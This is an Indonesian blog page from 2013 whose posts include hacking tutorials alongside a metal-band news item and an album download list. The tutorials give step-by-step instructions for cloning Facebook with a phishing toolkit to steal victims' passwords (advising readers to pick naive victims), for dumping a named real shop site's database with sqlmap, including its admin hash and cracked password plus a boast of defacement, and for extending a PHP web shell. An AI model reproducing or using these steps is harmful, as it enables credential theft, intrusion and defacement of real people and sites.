Minggu, 14 Juli 2013

Cara Hack Akun Facebook Dengan Backtrack 5 Terbaru

Selamat datang pemirsa :D, kali ini saya akan share cara hack facebook , hack facebook ?, ya !  , sabar bro , kali ini saya TIDAK akan membagikan Tool nya , karena sudah ada di Backtrack itu , dan kalo ada yang membagikan tool yang katanya tool hack facebook ?, itu pasti PALSU , karena tidak akan mungkin akun facebook bisa jebol semudah itu , dengan menggunakan tool gratis, dan cuman beberapa Kb saja .., oke langsung saja .., Buka tool set nya .

cara nya :

  • Liat Gambar
  • Pilih Social Engineering Attacks (nomor 1)

  • Pilih Website Attack Vectors (nomor 2)

  • Pilih Web Jacking Attack Method ( Nomor 6 )

  • Pilih Site Cloner (Nomer 2) , nah di sini kalian di suruh masukin IP kalian , cek IP kalian caranya masuk terminal ketik ifconfig Setelah tau IP kalian , masukan di sana , dan setelah itu masukan link facebook , https://www.facebook.com tunggu beberapa saat , dan kalau dia minta kalian tekan Enter , tekan saja

Nah , setelah jika tampilan sudah seperti ini , Berarti kamu sudah berhasil membuat salinan Web nya 

nah untuk mendapatkan Password dan email korban suruh korban login di : http://(IP_KAMU)/index2.html
nah terserah bagaimana kamu nyebarin IP itu , Selamat berkreasi !! ,


NOTE : TEKNIK INI HANYA BISA DI GUNAKAN PADA SAAT KITA ONLINE , JADI KALAU KITA PUTUS KONEKSI, KITA HARUS MEMBUAT ULANG, CARILAH KORBAN YANG AGAK GAPTEK , DAN INI HANYA UNTUK PEMBELAJARAN
 

Cara Deface Dengan Sqlmap Di Backtrack5

Apa itu SQLMap ?


SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+} BAHAN [+]




[+] LANGKAHNYA MAS BRO [+]
(*Untuk Windows kalian cari dulu ke sini )
1. Kita cari dulu target yang mau kita scan (*jika ada bugs akan seperti ini)
2. Buka dulu SQLMAPnya, kalo di Backtrack 5 ketikan printah
  • /pentest/web/scanners/sqlmap /
3. Ketikan printah ini :

  • python ./sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs
setelah itu klik enter, maka akan muncul Database Target (*See Image)
4. Setelah dapet nama Data Basenya kita ketikan printah :
  • python ./sqlmap.py -u http://TARGET.com -D nama_database -tables

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables  [tekan enter] hasil :
5. Setelah dapat table pada databasenya silahkan cari table yang menurut kalian ada USER + PASS website tersebut, kali ini saya coba scan TABLE USER, dengan perintah :

  • python ./sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns [lalu tekan ENTER] maka hasilnya akan seperti ini : 
6. Setelah itu kita scan lagi table itu untuk mendapatkan user dan pass admin website, dengan perintah :

  • python ./sqlmap.py -u http://www.target.com -D nama_database -T table --dump
Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump [tekan ENTER]

Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip"
  • do you want to crack them via a dictionary-based attack? [Y/n/q] maka hasilnya :

nah itu kita dapetin User + Passwordnya :D

User : admin
Pass : dfc560ef836a9a63c2bdbfb24a683624
Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :

Nah setelah saya Decrypt ane dapetin nih :
Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D


HASIL : 
masih kena deface tuh : http://www.vana-shop.com/
dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD

Semoga berhasil :)

Sumber : http://porzcommunity.binushacker.net

Sabtu, 13 Juli 2013

Cara menambah fitur baru dishell folder baru : (contoh menambah mysql)

1. Masukan code berikut :
<?php }
elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){
mkdir('mysql',0755);
chdir('mysql');
=============
elseif(isset($_GET['x']) && ($_GET['x'] == 'DIISI JUDULNYA')){
mkdir('FOLDER',PERMISSION);
chdir('FOLDER');

2. Maukan script MySQL Interfacenya (Kalo di shell ane udah ane encrypt cos lebih mudah :D

$mysql="PD8NCiRQ.......";

==========
$mysql <- namanya tererah yang penting di pemanggilannya nanti sama

3. Untuk membuat/mengambil file masukan code berikut :

file_put_contents('mysql.php',base64_decode($mysql));
==========
^mysql.php (file yang akan dibuat pada folder baru)
^$mysql <~ ini adalah nama pemanggil pada step ke-2 (ane asal aja gatau namanya XD)
^base64_decode : karena saya make encode base64 maka saya tulis itu kalo yang lainnya nanti tambahin aja sendiri :D

4. Terus kita chmod permission file mysql.phpnya
chmod('mysql.php',0755);

(ane juga gatau sih masalah chmod, mugkin biar bisa jalan :v)

5. Nah sebenernya ini udah jadi, tapi biar ngak perlu akses ( site.com/mysql/mysql.php) kita paang iframe

echo '<iframe src=mysql/mysql.php width=100% height=700px frameborder=0></iframe> ';
}

==============
Nanti bentuknya jadi seperti ini :
<?php }
elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){
mkdir('mysql',0755);
chdir('mysql');
$mysql="PD8NCiRQ.......";
file_put_contents('mysql.php',base64_decode($mysql));
chmod('mysql.php',0755);
echo '<iframe src=mysql/mysql.php width=100% height=700px frameborder=0></iframe> ';
}

langkah terakhir tinggal pasang di menunya :

<li><a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql">Mysql</a></li>
=======
x=mysql" <~ mysql terserah diisi apa yang oenting sama dengan => ($_GET['x'] == 'mysql')){

beres deh :'(
Maaf cuma ini yang bisa di share, kalo ada yang lainnya menyusul deh cos ane juga baru belajar Php sama om Gandrunx XD

Tutorial by : Garuda Dot ID

Senin, 08 April 2013

Vokalis Cradle Of Filth Bikin Buku Puisi

Vokalis Cradle of Filth, Dani "Filth" Davey telah menyelesaikan buku puisinya, "Across The River Bedlam", yang siap dirilis akhir tahun ini.

Buku yang akan berisi "puisi yang Dani tulis dari waktu ke waktu selama bertahun-tahun," ilustrasi digarap oleh Sam Araya, seniman yang bertanggung jawab untuk rilisan COF seperti "Thornography" dan "Harder, Darker, Faster" serta beberapa desain t-shirt band black metal asal Inggris tersebut.

Cradle Of Filth akan tampil di Hammersonic Festival 2013, yang digelar di Ecopark Ancol, 27-28 April mendatang.

Source : Hai online

Senin, 01 April 2013

How To Hacking Facebook 2013

Kali ini saya akan sharing tentang Cara Ngehack Facebook Terbaru 2013,sebenarnya cara ini adalah cara yang sangat amat mudah dilakukan bahkan anak SD pun bisa melakukannya yaitu pertama anda harus Sign Out dan mendaftar terlebih dahulu (gratis) ke Klik Disini kemudian buka web ini Klik Disini lalu copy ID facebook korban (contoh : www.facebook.com/blablabla) kemudian paste kan ID tersebut ke Klik Disini setelah mendapatkan Id yang berupa angka lalu copy ID tersebut dan paste kan ID tersebut ke Klik Disini (di bagian atas kanan) kemudian tinggal klik Hack Now dan selesai deh. ^_^

Selamat mencoba.....!!!!!

Kamis, 14 Maret 2013

Free Download Album Yuki Kashiwagi "Shortcake"

Type A
[CD]
01. Shortcake
02. Soredemo Nakanai
03. Sakura no Ki ni Narou Acoustic Ver. feat. Oshio Kotaro
04. Shortcake (off vocal.)
05. Soredemo Nakanai (off vocal.)
06. Sakura no Ki ni Narou Acoustic Ver. feat. Oshio Kotaro (off vocal.)
[DVD]
01. Shortcake (Music Video)

Type B
[CD]
01. Shortcake
02. Soredemo Nakanai
03. Mirai-bashi
04. Shortcake (off vocal.)
05. Soredemo Nakanai (off vocal.)
06. Mirai-bashi (off vocal.)
[DVD]
01. Shortcake (Music Video)

Type C
[CD]
01. Shortcake
02. Soredemo Nakanai
03. Class-kai no Ato de
04. Shortcake (off vocal.)
05. Soredemo Nakanai (off vocal.)
06. Class-kai no Ato de (off vocal.)
[DVD]
01. Shortcake (Music Video)



Theater
[CD]
01. Shortcake
02. Soredemo Nakanai
03. Jealousy Punch
04. Shortcake (off vocal.)
05. Soredemo Nakanai (off vocal.)
06. Jealousy Punch (off vocal.)
07. Kashiwagi Yuki × Ishikawa Rika (Special Interview)

                                                      Download